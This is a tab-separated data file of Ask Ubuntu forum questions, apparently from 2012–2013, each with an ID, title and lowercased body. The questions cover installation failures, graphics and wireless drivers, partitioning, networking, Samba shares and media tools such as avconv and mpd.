265453	installing huawei dongle in ubuntu 12.04	i have question . i tried for many days to install my huawei dongle e153 on to my computer with os ubuntu . but i had no success . can anyone help me to do it . i 'm a total ubuntu novice .
265461	can i boot ubuntu from a dvd ?	i do n't want to erase my windows 7 but i want to use ubuntu . is there an easy way to make a boot-able ubuntu dvd ? i really want to try out ubuntu on my windows 7 and having ubuntu everywhere i go .
265463	ubuntu 12.10 failing to install on alienware m17x	i would describe myself as quite familiar with linux and linux installations and i use ubuntu every day at work , however i have been completely unable to install 12.10 on my new alienware laptop at home . i boot from a 12.10 iso and i can get to the installer , however no matter which options i select ( try ubuntu or install ) the installation process starts and eventually i get a black screen and the computer just hangs there indefinitely . i have tried standard 'legacy boot ' and uefi booting , following the respective forum guides for each . i have also tried installing using 'nomodeset ' and on one occasion 'acpi=off ' without success . the furthest the installation has gotten is simply to the ubuntu splash screen with the little boxes underneath . no further than this , and certainly not to the point where i can select any other options . the laptop specs are : alienware m17x : standard base processor i7-3740qm ( 6mb cache , up to 3.7ghz w/ turbo boost 2.0 ) ( this is disabled in the bios currently ) display is widefhjd ( 1920x1080 ) wled lcd memory - 12288 1600 mhz dual channel ddr3 graphics : 2gb gddr5 nvidia geforce gtx 680m i 'm installing onto a fresh ssd with no previous grub / linux installations . all it has on it currently is a fresh install of windows 7 ultimate , which i have n't even logged into yet . there is no bios option to specifically disable optimus if that could be causing the issue . i would be very grateful for any insight into how i could resolve this . i specifically wish to have a dual boot installation rather than running ubuntu in a virtualised environment from within windows .
265466	update/upgrade ubuntu	i have ubuntu 10.10 maverik meerkat . when trying to update using the onboard update manager generates message , `` failed to download repository information , check internet connection '' . my internet connection works , ( i can surf the web ) i am trying to upgrade to the next version .
265471	`` autoreconf : not found '' error during making qemu-1.4.0	i was ./configure 'd the qemu-1.4.0 and during make it cause : ( cd /home/amin/simulate/qemu-1.4.0/pixman ; autoreconf -v -- install ) /bin/sh : 1 : autoreconf : not found make : *** [ /home/amin/simulate/qemu-1.4.0/pixman/configure ] error 127 now , i ca n't find how to pass this error . thanks .
265473	what is the @ sign added as a suffix to images used for apps based in the ubuntu sdk ?	i 've been looking at some example apps from the ubuntu sdk and from the touch developer preview source code , and i 've noticed that some images used as assets in those apps have a suffix with an @ sign followed by a number . e.g . avatar @ 8.png what is the purpose of naming images like that ?
265483	how can i find the package name of the program i want to install ?	how does one discover which command to run to install a piece of software ? for example , if i wanted to know the command to run to install virtualbox , how do i know that i should run sudo apt-get install virtualbox-4.2 , and not sudo apt-get install xyz ?
265489	why does n't the nova-cloud-controller charm properly set up openstack networking ?	i have an ubuntu quantal maas server and some computing nodes . i 'm trying to set up an openstack cloud by following the ubuntu cloud infrastructure walkthrough . everything looks okay ... i can bootstrap juju , deploy the charms ( maas nodes are booting precise ) , log into the dashboard , register images , and even boot vms , but networking is not working at all . i 'm trying to use the flatdhcpmanager on nodes with two ethernet interfaces . i 've verified separately that connectivity is not an issue ( e.g. , all the eth0s are on the same switch , all the eth1s are on a different switch , and if i just statically assign ip addresses on either network the nodes can communicate with each other ) . when i ssh into the nova-cloud-controller or nova-compute machine i can see that the bridge is never created and eth1 is not active . also , nova-network is never installed on any machine . i 've successfully gotten openstack up and running using devstack , so i know it will all run on my system , but i 'd really like to get things working with juju . so , should nova network be installed ? if openstack is installed correctly should i be able to connect to nova-cloud-controller and nova-compute and see the bridge set up ? ( and if so , does this happen before or after setting up relations ) and does anyone have any ideas on what i could try to fix the problem ?
265492	how do i get rid of a corrupted filename ( / inside ) in ext4 home mount point ?	/home sudo ls -l rubish ls : ca n't access rubish/tongue/gif : none file of folder of that kind total 0 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? tongue/gif i could move the folder to the top of /home but i ca n't move it outside another partition : sudo mv rubish /svr mv : unable to evaluate `` rubish/tongue/gif '' : none file of folder of that kind thank you
265498	unity cropping external monitor : how do i fix it ?	i i have a dual-screen setup with my laptop ( 1366x768 ) and an external monitor connected through hdmi ( primary 1920x1080 ) . i do n't know if this is cause by different aspect ratios ( 16:10 on laptop , 16:9 on external monitor ) but unity appears cropped approximately as shown in this picture : if i use a lower resolution ( 1680x1050 , 16:10 ) the desktop is correctly displayed , but those extra pixels could be handy . so is this any limitation/bug on unity ? how can i make it display the desktop correctly at 1920x1080 pixels ? in case it could help , output of xrandr command .
265499	there was an error creating the child process for this terminal	i am using ubuntu since the version 10.04 and found it more friendly as compared to windows . right now i am using ' precise 12.04` . i have created many custom launchers for bash scripts , and never had any problem until yesterday . i have installed a software suite which has multiple executables . the main executable abaqus is located in \opt\softwaresname and is a symbolic link to the executable abq610i in /opt/softwaresname/executables/ . the main exe abaqus requires some command-line arguments . i use the argument cae , ( i.e . abaqus cae ) but with another command to render the graphics in a better mode , hence the final call is : xlib_skip_argb_visuals=1 abaqus cae i made an alias for this long command in .bash_rc file as : alias abaquscae= '' xlib_skip_argb_visuals=1 abaqus cae '' everything worked perfectly fine , as the alias runs the software . being a lazy champ , i thought of creating a cairo-dock launcher for this . so i entered abaquscae in the box `` command to launch on click '' and checked `` run in a terminal '' . however to my dismay , upon click the launcher it gave an error : : there was an error creating the child process for this terminal failed to execute child process `` abaquscae '' ( no such file or directory ) consequently i wrote a small bash script file `` abaquscae.sh '' : # ! /bin/sh '' xlib_skip_argb_visuals=1 abaqus cae '' and saved in , made it executable and upon running it in bash shell i again got the similar error , i.e . : ./abaquscae.sh : 2 : ./abaquscae.sh : xlib_skip_argb_visuals=1 abaqus cae : not found now i am totally lost , i have tried many tricks e.g . 1- removing commas in the bash script , 2- making it dos2unix , 3- using full path to the executable but this script is not running through bash terminal . problem : the command ( as well as its alias ) are work fine in the bash terminal , however when they are run through some other channel ( e.g . scripts/launchers ) the terminal miserably fails to recognize them : ( .. if any expert has advice/information about how to solve this problem , please share . i will be very thankful .
265501	typing of pali language in ubuntu 10.04	i 'm using ubuntu 10.04 and i need to type pali ( http : //en.wikipedia.org/wiki/pali ) . has anyone some suggestions how i can do it ?
265504	how to monitor dhcp leased ip address	i have ubuntu server 12.10 as drbl and clonezilla . how can i find out how many ip addresses have been assigned to the clients . how do i control/monitor the dhcp daemon service ( stop/start/status ) ?
265511	how to install kde icon theme in ubuntu ? ( rosa icons )	i recently got the great rosa icon theme from the rosa repo , i extracted the archive and put it into the .icons folder , under kde i can select the icons no problem , but under unity using gnome tweak tool they ca n't be selected ( nor in ubuntu tweak ) so i assume that there needs to be further steps in order to use a kde icon theme in the unity/gnome desktop ? any ideas ? thanks
265512	how to partition while installing ubuntu 12.10	i have 320 gb hard disk . i want to create like windows partitions like c drive for os install . and d , e for store other files . i try this already . but that is partitioned as like usb flash drives . this partitions only stored files . but i tried to create alias for xampp projects from this folders . it shown forbidden errors . so how to create partitions ?
265514	download to vmware	i burned an iso disk of ubuntu 12.10 to boot into vmware . it downloads successfully but the icons do not appear on the left side of the screen like they should . i am not sure if it is the vmware player causing the problem or if it is in the iso file i downloaded ? my current os on my notebook is widows 7 home premium 64 bit .
265518	file recovery after reformattig ext3/4 partition -- extract old journal/superblock ?	i seem to have reformatted my /home partition ( previously ext4 ) as ext3 during an ubuntu installation . it took me a couple of mounts to figure that out . which , of course , is a bad thing . i 've tried some of the usual data recovery tools - photorec gives me ~60000 files , but of course completely unsorted . i 've stumbled across ext4magic , which is able to restore accidentally deleted files while preserving the directory structure , metadata etc . however , as the doc states : was accidentally created a new file system on the old , and thus the file system meta data are completely overwritten , this option can not help because , then only a empty file system will be found . i 'm now wondering if there is any way to extract the old metadata from the image so as to feed them to ext4magic separately . this , i guess , would require that the journal/superblocks of the new file system have been written to different blocks than they were before . are those blocks the same on every format ( which would defeat my endeavor ) , or are they somehow randomly assigned ? any chance that the change from ext4 to ext3 comes in handy here ? of course , other solutions are welcome as well .
265519	is photoshop possible on ubuntu touch	is it possible to run a full version of photoshop on ubuntu touch . i 'm thinking about switching my wife from a standard laptop to a tablet ( nexus 10 ) , but she does a lot of photo editing and i do n't want her to be stuck with the limited photoshop touch version . has anyone managed to use the full version on a tablet yet ?
265531	under `` system settings - > details '' `` graphics '' shown as `` unknown ''	i recently installed ubuntu 12.04 on my desktop . system details shown by ubuntu are as : memory : 3.8 gb processor : intel® core™ i3-3220 cpu @ 3.30ghz × 4 graphics : unknown os : type 32-bit now i do n't understand why graphics is 'unknown ' . is n't it supposed to show graphics : intel corporation ivy bridge graphics controller ( rev 09 ) ( as i do n't have any other graphic card installed on my motherboard , so it should show the default one ) . when i executed : lspci | grep vga it showed 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) then i executed : sudo apt-get install xserver-xorg-video-intel and it gave following as output : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : xserver-xorg-video-intel : depends : xorg-video-abi-11 depends : xserver-xorg-core ( > = 2:1.10.99.901 ) e : unable to correct problems , you have held broken packages so over all i 'm stuck here and do n't know what to do . any help appreciated . thanks .
265532	create a virtual desktop and share it over the internet	i was wondering if there is anyone who has an idea how to do a display trick . here is the deal , i have ubuntu on my laptop and we have a bunch of desktop computers in the university . i ca n't unplug the cables from the monitor and plug them in my laptop and i am looking for a way to do it wirelessly . my idea is to create a 'virtual ' desktop next to my laptop desktop and then stream this desktop over the internet , maybe skype , maybe some other tool you might suggest , to the university desktop machine , so that i can have two displays . thanks in advance !
265535	is there any way to access usb drive from desktop	my ubuntu is 12.10 is running on hp 4000 pc , it has several usb ports , i just attached a flush drive to one of the usb ports . how can i access my usb flash drive ? thanks for your comments . kevin
265538	how can i use ubuntu server 12.04.2 lts as a mail server to be able to retrieve emails using ms outlook as the client ?	i want to create a mail server using ubuntu server 12.04.2 lts , but need to be able to retrieve emails using ms outlook as the client . i have a spare pc which i am going to install ubuntu server 12.04.2 lts . how do i go about configuring it to be a mail server , and i specifically need to be able to retrieve email using ms outlook on another windows 7 pc . both pc and server will be on the same lan/network .
265542	upgrade stuck on `` configuring stgit ''	my upgrade process seems to be stuck . ca n't seem to find anything on the internet about this particular problem . here 's what i can see . i 've since killed the process and tried anew . $ sudo dpkg -- configure -a setting up initramfs-tools ( 0.103ubuntu0.2 ) ... update-initramfs : deferring update ( trigger activated ) setting up rhythmbox-plugins ( 2.97-1ubuntu6.1 ) ... setting up grub-pc ( 2.00-7ubuntu11 ) ... installation finished . no error reported . generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-25-generic found initrd image : /boot/initrd.img-3.5.0-25-generic found linux image : /boot/vmlinuz-3.2.0-38-generic-pae found initrd image : /boot/initrd.img-3.2.0-38-generic-pae found linux image : /boot/vmlinuz-3.2.0-37-generic-pae found initrd image : /boot/initrd.img-3.2.0-37-generic-pae found linux image : /boot/vmlinuz-3.2.0-36-generic-pae found initrd image : /boot/initrd.img-3.2.0-36-generic-pae found linux image : /boot/vmlinuz-3.2.0-35-generic-pae found initrd image : /boot/initrd.img-3.2.0-35-generic-pae found linux image : /boot/vmlinuz-3.2.0-34-generic-pae found initrd image : /boot/initrd.img-3.2.0-34-generic-pae found memtest86+ image : /boot/memtest86+.bin same deal .
265546	ethernet network card & wifi card	my ubuntu 12.10 box has two network cards , ethernet card ( eth0 ) is connected to internal network ( 192.168.18.0/24 ) without any internet access , wireless card ( wlan0 ) is connected to intranet ( 10.124.64.0 , 255.255.252.0 ) which has internet access . when i try to access internet , i have to disable ethernet card ( eth0 ) . is there any way to config ip route from ubuntu , something like 0.0.0.0 0.0.0.0 wlan0 , so i can access internet without disable ethernet 0 card . thanks for your help . kevin
265548	how can i install ubuntu in vmware workstation in windows 8 ?	i bought a new sony vaio laptop . i found that i can not dual boot in this system ( model sve15136cns ) . when i try to use it on a virtual machine ( vmware ) it suddenly shuts down .
265549	ubuntu 12.04 64 bit wo n't play dvds	i have a lenovo t400 with an intel cenrino 2 vpro prcessor and i am running ubuntu 12.04 64bit . for the most part , everything is running great , but i have one problem . for some reason i can not play dvds at all . i am able to play all other video formats with no problem , but when it comes to dvds , i keep getting an input/output error . i have tried about a dozen dvds and still come up with the same problem . i can play cds with absolutely no problem . i also have all the needed drivers and such needed to play dvds . am i the only one with this problem ? and is this fixable ? and how ? thank you .
265551	several questions regarding software on ubuntu 12.10	so , i recently installed ubuntu 12.10 but i have problems setting up my microphone , i got a creative sound-card and i already tried alsa . second i need to have adobe cs 5.5 installed for studying but wine does n't work with installing it via cdrom , i heard there is a workaround the installer but i cant seem to find any ; ( and at last i am playing league of legends and d3 , i got both to work with playonlinux but the performance seems pretty bad even tho i have a good system with amd 6xcpu 2gb gpu etc , i 'm running gnome classic ui on 2 screens , i 'm not sure maybe you can get me some hints on increasing performance , i tried several stuff i found on the interwebz but does n't work so well .
265553	broadcom corp. bcm4313 wirelss not detected in ubuntu 12.10	i update my toshiba portégé from precise ( 12.04 ) to quantal ( 12.10 ) . after update to precise wireless device works fine . but after update wireless device is not detect on network manager . the lspci command says : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : askey computer corp. device [ 144f:7175 ] control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 3 region 0 : memory at d4500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel modules : bcma the ethernet connection works fine . i try to install firmware-b43-installer but it says : $ sudo apt-get install firmware-b43-installer ... unsuported device ( s ) found : pci id 14e4:4727 aborting more info related gived by lshw : root @ caprica : ~ # sudo lshw -class network *-network descripción : ethernet interface producto : 82577lc gigabit network connection fabricante : intel corporation id físico : 19 información del bus : pci @ 0000:00:19.0 nombre lógico : eth0 versión : 06 serie : e8:9d:87 : ed : f4:2a tamaño : 1gbit/s capacidad : 1gbit/s anchura : 32 bits reloj : 33mhz capacidades : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuración : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.0.0-k duplex=full firmware=0.12-6 ip=192.168.1.5 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s recursos : irq:41 memoria : d4700000-d471ffff memoria : d472a000-d472afff ioport:3020 ( size=32 ) *-network no reclamado descripción : network controller producto : bcm4313 802.11b/g/n wireless lan controller fabricante : broadcom corporation id físico : 0 información del bus : pci @ 0000:02:00.0 versión : 01 anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress bus_master cap_list configuración : latency=0 recursos : memoria : d4500000-d4503fff i execute this too and this is the output : root @ caprica : ~ # rfkill list all 0 : toshiba bluetooth : bluetooth soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no i have checking the model in http : //linuxwireless.org/en/users/drivers/b43 : bcm4313 - chipset uses unsupported lcn phy , we work on it i had configured privated drivers in the visual enviroment , broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source but do n't work neither . some help ? thank you very much for the help
265554	applications can not access network shares via samba ?	i have ubuntu 12.04 lts installed ( i 'm running kde 4.8 instead of unity ) . samba share via dolphin works absolutely fine . i have access to all my files on my windows pc . however , when it comes to open files that are hosted on my windows machine via an application ( e.g . thunderbird or k3b ) it just does n't work . i can add files but than the applications say no file added . i guess , somehow i have to give ubuntu applications permission to access the windows network ? what can i do ?
265556	how do i stop nautilus from popping-up a window when i attach a device ( phone , usb , etc ) ?	i just upgraded to raring from 12.10 and there is an annoying new behavior . everytime i attach a device , or worse , reboot my phone , nautilus throws up a pop-up window with the filesystem contents . i do not mind automounting , in fact , usually i like it , but i really do n't need nautilus to pop-up a window . i reboot my phone a lot when i 'm working on it and so this is highly annoying .
265557	using 12.04 's wubi installs 13.04 instead	i have windows 7 installed on my machine , and i used 12.04 's wubi installer with the command wubi.exe -- 32bit . i have installed ubuntu this way several times before successfully . for some reason , in 13.04 , i ca n't log in using my chosen credentials , and anyway , i 'm interested in 12.04 , which is very stable and satisfying . any ideas why 13.04 installed instead of 12.04 , when i specifically used 12.04 's wubi installer ?
265558	how do i burn multiple ubuntu isos on one dvd ?	i always find it a waste putting a 790mb ubuntu iso on a 4gb dvd , and i was wondering how to put multiple operating systems on one dvd with a grub menu . i know it is possible , but i just do n't know how !
265559	unity launcher from 12.10	i have ubuntu 12.10 installed on hp 4000 pc , how can i start unity launcher ? do i need to install any packages before i can use it . any comments are highly appreciated . thanks for your help . kevin
265560	brasero does n't quit properly	i noticed that the brasero disk burner does n't open if i have used it before , and it was still running , but invisible . i have to close it with system monitor and then open it again . i was wondering if there is some bug fix for it .
265561	problems with opening 1.3m webcam	i was wondering why i can not open my 1.3m webcam . when i want to open it , it will say that please close all other devices that are connected with the 1.3m webcam . when i want to install it , it will describe it as an unknown device ? i already checked the software , but it seems that i still can not open it . what should i do ?
265566	screen does not work after installing nvidia-current on ubuntu 12.04	i have problem installing the nvidia drivers for my gpu , nvidia tesla c2050 . i have tried to use both the drivers from nvidia and the drivers from ubuntu i have been advised to use the drivers from ubuntu so the latest thing i tried is the following : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates what happend is that if i after a fresh installation of ubuntu 12.04 tries to do sudo apt-get install nvidia-current nvidia-current-dev i first get the message that it can not be installed because it says something like : missing dependencies xorg-video-abi-11 and xserver-xorg-core so i install them using sudo apt-get install xorg-video-abi-11 xserver-xorg-core then i use sudo apt-get install nvidia-current nvidia-current-dev sudo apt-get dist-upgrade sudo reboot and now when i press ctrl-alt-f1 it is just black and the screen goes in sleeping mode or it is just a black screen with white dots on it . i have tried for three days now to install nvidia correctly so that i can install cuda later for my research . i basically want cuda to work without any problems , maybe i should just install cuda directly using the nvidia-drivers ? any help would be appreciated ! for instance what drivers to use , ubuntus or nvidia 's . / erik
265567	change keyboard layout with both left and right alt + shift combos	i use english and persian keyboard layout on my ubuntu system . i want to change the keyboard layout both with left alt+left shift and right alt + right shift . currently i can not use right alt+right shift to change the keyboard layout from persian to english so that i have to use left alt+left shift to change it . does anybody know how i can set alt+shift to change the keyboard layout on both sides ? i use ubuntu 12.04 . thanks !
265574	iâ´m searching for cracklib2-dev to use in progress of connecting my mac to the ubuntu server	tried for many hours to install cracklib2-dev . how can i do this in terminal ?
265580	sed/awk make lines starting with lower characters be merged to previous line	here is what i have this is a sample text how to do it ? i need the output to be : this is a sample text how to do it ? in addition , how can i achieve the same with : this is a sample text how to do it ? how to append lines starting with non upper case characters to be appended each to previous line ?
265581	is 12.10 avconv 's image sequence support ( img % 03d.jpg ) broken ?	i 'm using avconv version 0.8.5-6:0.8.5-0ubuntu0.12.10.1 , and am trying to encode a sequence of pngs into a video , using the wildcard format ( avconv -f image2 -i img % d.jpg /tmp/a.mpg ) , found in both the man ( http : //manpages.ubuntu.com/manpages/precise/man1/avconv.1.html ) and the libav faq ( http : //libav.org/faq.html # how-do-i-encode-single-pictures-into-movies_003f when i try to use it i get the error `` no such file or directory '' . i have 196 images in a directory `` frames_1fps '' from `` out_0000.png '' to `` out_0195.png '' . $ ls frames_1fps $ avconv -f image2 -i frames_1fps/out_ % 04d.png avconv_out.avi avconv version 0.8.5-6:0.8.5-0ubuntu0.12.10.1 , copyright ( c ) 2000-2012 the libav developers built on jan 24 2013 14:49:20 with gcc 4.7.2 frames_1fps/out_ % 04d.png : no such file or directory i ca n't see what 's wrong here - is avconv broken ? nb : i have successfully used avidemux to join the images into a video with avidemux2_cli -- video-codec dv -- fps 2 -- load frames_1fps/out_0000.png\ -- save avidemux_out.avi -- quit , but i want to use avconv 's `` -r '' option to change frame rate on input and output . edit : i installed ffmpeg from https : //launchpad.net/~jon-severinsson/+archive/ffmpeg , and get the same results .
265582	are there any offline blogging tools available ?	i am looking for an application ( not a browser extension ) that supports offline blogging and uploading ( when needed ) . is there any such tool ? i am primarily looking for compatibility with blogger .
265588	cant launch linux ( i 've tried many methods )	im a newbie in linux , so i dont know how to fix these problems : i have intel core i5 , 3 gb ram and nvidia geforce 310m ( 512 mb ) i really want to try linux , but i cant even launch it . when i boot from cd , i tried to enter , ,try linux , , and , ,install linux , , , but when launch screen with ubuntu logo appears , after five minutes dots stop blinking . i was waiting for an hour , but nothing changed . then i 've created a boot usb , but i had the same problem . so i tried to install it through windows 8 . i installed wubi and when i boot linux , the black screen of loading appeared , and after some minutes it stopped ( i do not remember at what moment ) i also tried to change mode to , ,nomodeset , , but nothing changed . i dont know what to do ( (
265591	ubuntu 12 with logitech c525 webcam , and disabling auto exposure inside a virtual machine	this problem may be related to v4l2 ctl exposure-auto-setting fails which has not been answered and has remained opened since november . i am using the c525 with opencv , and for my application to work properly , i need to disable auto exposure , the exposure automatic priority , and the auto focus . default settings from video4linux control panel : when i try and change exposure auto priority : i am running my application in a vmware player instance , running ubuntu 12.04 x86_64 , with a windows 7 64 bit host . i currently do n't have the option of doing a full install of ubuntu , but i do n't see why this would be an issue with running inside a virtual machine . update : i fiddled with the settings , and was able to change auto exposure priority , but then inside opencv , i get a lot of device timeouts .
265594	laptop stuck on native resolution ( 1920 x 1080 )	i just upgraded from 11.10 to 12.04 and i can no longer change my resolution . laptop : lenovo w520 nvidia x server settings reports 1920 x 1080 as the only option . which is normally fine but does n't work anytime i want to connect to a projector with lower resolution as cloning only clones part of the screen to the projection and presentations look pretty messed up . : ( this used to work fine with 11.10 not sure what changed . please let me know if you have any ideas on how to fix this . thanks ! sm
265595	how to control the screen rotation in ubuntu 12.10 via an icon on the panel ?	is there is a program that displays an icon in the panel , to control the rotation of the monitor ?
265599	how to upgrade ubuntu 10.10 ?	i had downloaded ubuntu 12.10 several times and i tried to install it with usb stick and cd ( or dvd ) but i experienced several errors . i had a ubuntu 10.10 dvd , so i have just installed it . but it seems ubuntu 10.10 's update and language support is n't working anymore . so i 've searched and tried everything to upgrade it , but i always run across a error saying 10.10 's repositories no longer supported . even i 've just added 12.04 's repositories and tried again , but i again run across an error saying the same thing . so how can i upgrade ubuntu 10.10 to 11.04 ?
265603	nvidia geforce 210 on 12.10	last night i installed the geforce 210 into my hp a6152n desktop , in attempts to get starcraft 2 just up and running ( not a huge gamer and i do n't really need all of the bells and whistles ) . the computer booted fine while using the nouveau driver by default , so i figured everything was good . i ran starcraft 2 through playonlinux and wine and the game boots correctly , the loading screen seems fine , until you get into the battlenet login screen . none of the text is readable ! it 's all white blocks , and it seems as if the background does n't have all of the necessary graphics . bare with me , i 'm a week new to ubuntu . so i start trying all of the `` experimental '' and proprietary driver included in additional drivers and none of them work . they all break unity and the startup splash screen . the splash screen looks like it 's from dos , and when the computer boots it 's resolution is way down , and there 's no dash or top bar for me to do anything . any advice is appreciated . my setup : hp a6152n intel core 2 quad q6600 3bg ram nvidia geforce 210 ( hopefully )
265608	how to format home partition !	a short time ago i installed ubuntu alongside windows . a lot of things went wrong and i decided to reainstall ubuntu on the partitions the old ubuntu was using . for this installation i created four different partitions : \ , \home , \boot and swap , i indicated the old ubuntu partition to be the new home partition ( maybe i did n't chose to format it ) . now when i turn on the pc , there are two ubuntus in the grub list , one which is functioning well ( the latest ) and one which is not functioning well ( the earlier ) . i suppose the earlier ubuntu installation is still surviving in the \home partition . is it possible to format only the home partition while keeping it structure ( or format it and reinstall the structure without getting into new chaos ) ? some images image 1 - this is my partition list image 2 - this is what i get when i click `` file system '' image 3 - this is what i get when i click `` home '' . it is different from my current home folder . image 4 - inside there is another ! `` home folder '' which contains the folder imagination3 , the name of my profile on the old installation . it is the home folder of the old installation . image 5 - returning to image 3 , the temitope folder is the home folder of the new installation , i.e . clicking on it bring me to my current home folder . note that the new home folder is not equal to the partition \home . i 'm trying to say : clicking on my current home folder does n't open the media \home , but open \home\temitope . so , what i need is to put an order in this home directory and partition issue , which i suppose implies eliminating the parasitic old installation , which should solve the grub entry issue .
265610	why ca n't i move my license key to the correct folder ?	i just purchased transition dj for ubuntu . it 's installed but it wo n't launch . when i talked to the software developer , he said i need to add a file that has the license key in it to the transitions dj folder . i created the file , but when i tried to copy it into the transitions dj folder , i am told that i am not allowed because i am not the owner of the file , but i do n't understand since the folder is on my own computer . why am i not allowed to copy a file into any folder i want ?
265614	digital sound out dissapears when connecting creative live ! cam chat	i tried the cam and the digital out signal dissapears when connecting the cam . everything is fine when i unplug it . i reinstalled ubuntu 12.04 lts 64 bits , same problem . in sound settings outputs , everything dissapears except analog out when connecting the cam . does anyone have a clue for what i can do to fix this problem . in windows i use google to find the solution to problems like this . but with linux i can not figure out witch solution to use , ending messing up things .
265617	gparted does n't work in 12.04 live cd	here is the output from fdisk runing from 12.04 live : ubuntu @ ubuntu : ~ $ sudo fdisk -lu disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x41ab2316 device boot start end blocks id system /dev/sda1 * 476230923 481468049 2618563+ c w95 fat32 ( lba ) /dev/sda2 240975 100904270 50331648 7 hpfs/ntfs/exfat /dev/sda3 100920330 481468049 190273860 f w95 ext 'd ( lba ) /dev/sda4 481468050 488392064 3462007+ db cp/m / ctos / ... /dev/sda5 476230923 481468049 2618563+ dd unknown /dev/sda6 160955298 227078774 33061738+ 83 linux /dev/sda7 467523693 476230859 4353583+ 82 linux swap / solaris /dev/sda8 100920456 105161489 2120517 83 linux /dev/sda9 105161553 141420194 18129321 83 linux /dev/sda10 455233968 467523629 6144831 83 linux /dev/sda11 392194908 455233904 31519498+ 83 linux /dev/sda12 330328593 392194844 30933126 83 linux /dev/sda13 141420258 160955234 9767488+ 83 linux /dev/sda14 227078838 236364344 4642753+ 83 linux partition table entries are not in disk order i ca n't see any overlaps ( unless i 'm missing something ) gparted just shows 1 lump of unallocated space . fs browser shows all partitions , they can be mounted and read . pt was written by gparted last time i did an install ( i think 10.04 from standard live .iso )
265619	ubuntu 10.04 not seeing scsi scanner ( scanpartner 15c )	i 'm unable to see my old-school scsi scanner in ubuntu 10.04 . here 's what dmesg , lsscsi , and lsmod show : root : ~ # dmesg | grep adaptec [ 18.586163 ] scsi5 : adaptec aic7xxx eisa/vlb/pci scsi hba driver , rev 7.0 [ 18.586164 ] < adaptec 2902/04/10/15/20c/30c scsi adapter > this suggests to me that the scsi card is being seen , and there is a valid driver . lsmod output : scsi_transport_spi 26284 1 aic7xxx lsscsi ouput : root : ~ # lsscsi -h [ 0 ] ata_piix [ 1 ] ata_piix [ 2 ] ata_piix [ 3 ] ata_piix [ 4 ] usb-storage [ 5 ] aic7xxx [ 6 ] usb-storage my question is : what other troubleshooting steps should i take ?
265621	how do i connect a windows xp pro and ubuntu 12.04 together over the network	how do i connect a windows xp pro and ubuntu 12.04 together over the network . i used the networking wizard in windows to create a networking setup . i am not sure i did it right , so maybe someone can help me setup windows networking properly . and then can you tell me how to connect to that windows network from ubuntu 12.04 . and i have another box that that is running openbox with xfe and i would like to know how to connect that box also . so i need to connect an ubuntu 12.04 box and an ubuntu server box running openbox with xfe . thanks so much for your help as i 've been pulling my hair out .
265623	is there a modern equivalent of python-vm-builder ?	i 'm trying to find the best-practice , modern way of doing what i used to do with python-vm-builder ( aka ubuntu-vm-builder ) . i want a scripted , repeatable way to start from something like ubuntu-core ( aka the artist formerly known as jeos ) , add some packages , define first-run scripts , etc . what i 'm after is something akin to spinning a custom iso ( although it wont be an iso , it will be an `` installed '' system ) . the result needs to be a kernel , initrd image , and rootfs that is suitable for a diskless pxe boot with nfs . what tools are used to create say the ubuntu netboot image ( or any ubuntu images for that matter ) ? are they flexible enough for my needs ? how about the tools used to create the fresh-install environments used for the ubuntu integration testing ? would they be appropriate ? note that at run time the rootfs will be mounted read-only , so i 'm not looking to manage an instance over time . i 'm looking to re-spin an automated install at each new ubuntu release , and periodically in the 6 months between .
265626	how to install testdisk from source	i have just come downloading a software called testdisk-6.14-wip.linux26.tar.bz2 . therefore i 'm wondering how to deal with the installation .
265629	mpd httpd streaming not working	i have installed mpd and configured it to work flawlessly with gmpc locally . i also use mpdroid on my phone and i want to stream music from my library to the phone . the music control from mpdroid works without a glitch . but when i try to stream from mpd no sound comes of phone and connection is not established . here is my mpd.conf file # user `` mpd '' bind_to_address `` 0.0.0.0 '' audio_output { type `` alsa '' name `` sound card '' device `` hw:0,0 '' # optional format `` 44100:16:2 '' # optional mixer_device `` default '' # optional mixer_control `` pcm '' # optional mixer_index `` 0 '' # optional } audio_output { type `` httpd '' name `` my http stream '' encoder `` lame '' # optional , vorbis or lame port `` 8000 '' quality `` 2.0 '' # do not define if bitrate is defined # bitrate `` 128 '' # do not define if quality is defined format `` 44100:16:1 '' } mixer_type `` software '' and this is mpd.log mar 09 00:17 : player_thread : played `` english songs/music/osts/ ( 500 ) days of summer [ complete with bonus soundtracks ] [ 2009 ] /10 - feist - mushaboom.mp3 '' mar 09 00:26 : output : failed to enable `` my http stream '' [ httpd ] : failed to bind to ' [ : : ] :8000 ' : address already in use mar 09 00:26 : avahi : service 'music player ' successfully established . mar 09 00:26 : ffmpeg/mp3 : header missing mar 09 00:26 : ffmpeg/mp3 : could not find codec parameters ( audio : mp3 , 0 channels , s16 ) mar 09 00:26 : ffmpeg/mp3 : estimating duration from bitrate , this may be inaccurate mar 09 00:26 : ffmpeg/mp3 : header missing mar 09 00:27 : output : failed to enable `` my http stream '' [ httpd ] : failed to bind to ' [ : : ] :8000 ' : address already in use help please !
